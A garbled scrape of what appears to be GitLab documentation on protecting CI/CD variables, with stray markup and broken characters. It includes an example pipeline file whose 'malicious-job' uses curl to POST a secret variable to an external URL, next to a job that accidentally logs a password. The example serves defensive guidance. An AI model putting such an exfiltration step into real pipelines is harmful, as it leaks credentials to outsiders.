![]() Malicious scripts like in malicious-job must be caught during the review process. You can also limit a variable to protected branches and tags only.Īlternatively, use the GitLab integration with HashiCorp Vault To help reduce the risk of accidentally leaking secrets through scripts like in accidental-leak-job,Īll variables containing sensitive information should be masked in job logs. gitlab-ci.yml file:Īccidental-leak-job : script : # Password exposed accidentally - echo "This script logs into the DB with $USER $PASSWORD" - db-login $USER $PASSWORD malicious-job : script : # Secret exposed maliciously - curl -request POST -data "secret_variable=$SECRET_VARIABLE" "" The following example shows malicious code in a. ![]() gitlab-ci.yml file of imported projects before you add files or run pipelines against them.
0 Comments
Leave a Reply. |